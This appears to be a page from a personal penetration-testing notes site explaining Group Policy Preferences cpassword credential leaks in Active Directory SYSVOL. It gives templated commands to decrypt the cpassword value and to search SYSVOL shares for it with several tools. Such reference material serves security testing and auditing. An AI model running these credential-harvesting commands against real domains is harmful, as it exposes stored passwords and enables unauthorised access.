Skip to content

My Hacking Notes

GPP/SYSVOL Credential Leaks

My Hacking Notes

Home
OSINT
Network Scanning
Ports / Services
Port Forwarding and Tunnelling
Password Cracking
Password Cracking
- Hashcat
- Wordlists
Windows
Windows
- Workstations
  Workstations
  - Privilege Escalation
- Active Directory
  Active Directory
  - Methodology
  - Remote Execution Tools
  - PowerShell Commands
  - CMD Commands
  - Relay & Coercion
    Relay & Coercion
    
    Relay (ntlmrelayx)
    
    RPC Coercion
    
    Responder
    
    mitm6
    
    Insecure Name Resolution Protocols
    
    WPAD
    
    Exchange Coercion (PrivExchange)
  - Discovery & Audit
    Discovery & Audit
    
    SMB & RPC Enumeration
    
    SMB Shares & Data Hunting
    
    LDAP Checks
    
    BloodHound
    
    User Enumeration
    
    Password Spraying
  - Privilege Escalation
    Privilege Escalation
    
    ADCS Discovery
    
    ADCS - ESC 1
    
    ADCS - ESC 8
    
    Shadow Credentials
    
    BadSuccessor (dMSA Abuse)
    
    ZeroLogon
  - Credential Access
    Credential Access
    
    SAM/SECURITY/SYSTEM
    
    DCSync
    
    DPAPI
    
    AutoLogon
    
    GPP/SYSVOL Credential Leaks GPP/SYSVOL Credential Leaks
    Table of contents
    
    Decrypt cpassword
    
    Locations
    
    Search SMB SYSVOL for cpassword
    
    MANSPIDER
    
    nxc
    
    CMD
    
    PowerShell
  - Delegation
    Delegation
    
    Discovery
    
    Resource Based Constrained Delegation (RBCD)
    
    Unconstrained Delegation (KUD)
    
    Constrained Delegation (KCD)
  - Kerberos
    Kerberos
    
    Authentication Process
    
    S4U2self and S4U2Proxy
    
    Password / Hash -> TGT
    
    AS-REP Roast
    
    Kerberoast
    
    Ticket Forgery
    Ticket Forgery
    
    Golden Ticket
    
    Silver Ticket
- File Transfer
  File Transfer
  - Download to Windows
  - Upload from Windows
Microsoft Entra ID (Azure AD)
Microsoft Entra ID (Azure AD)
- Discovery & Recon
  Discovery & Recon
  - Federated vs Managed
  - Username Enumeration
- Password Spraying
  Password Spraying
  - Tools
WiFi
WiFi
CTF Walkthroughs
CTF Walkthroughs
- Proving Grounds
  Proving Grounds
  - Cassios
  - Cobweb
  - Muddy
  - Forward

SYSVOL - GPP cpassword¶

Some Group Policy Preferences (GPP) items include a password. In the underlying XML, that password is stored as cpassword. It is encrypted with a known static key (effectively plaintext). These XML files reside in SYSVOL on domain controllers.

Search Domain Controller SYSVOL SMB shares for cpassword.

Decrypt `cpassword`¶

gpp-decrypt <cpassword>

Locations¶

\\<domain_fqdn>\SYSVOL\<domain_fqdn>\Policies\{GPO-GUID}\Machine\Preferences\*
\\<domain_fqdn>\SYSVOL\<domain_fqdn>\Policies\{GPO-GUID}\User\Preferences\*

Search SMB SYSVOL for cpassword¶

MANSPIDER¶

manspider <dc_or_cidr> -d <domain> -u <user> -p '<pass>' --sharenames SYSVOL -e xml -c cpassword -n

KRB5CCNAME=<ccache> manspider <dc_or_cidr> -d <domain> -k --sharenames SYSVOL -e xml -c cpassword -n

nxc¶

nxc smb <dc_or_cidr> -u <user> -p '<pass>' --spider SYSVOL --content --pattern cpassword

CMD¶

findstr /S /I /M /C:"cpassword" \\%USERDNSDOMAIN%\SYSVOL\*

PowerShell¶

Get-ChildItem "\\$env:USERDNSDOMAIN\SYSVOL" -Recurse -Filter *.xml -ErrorAction SilentlyContinue | Select-String -SimpleMatch -Pattern 'cpassword' | Select-Object -ExpandProperty Path -Unique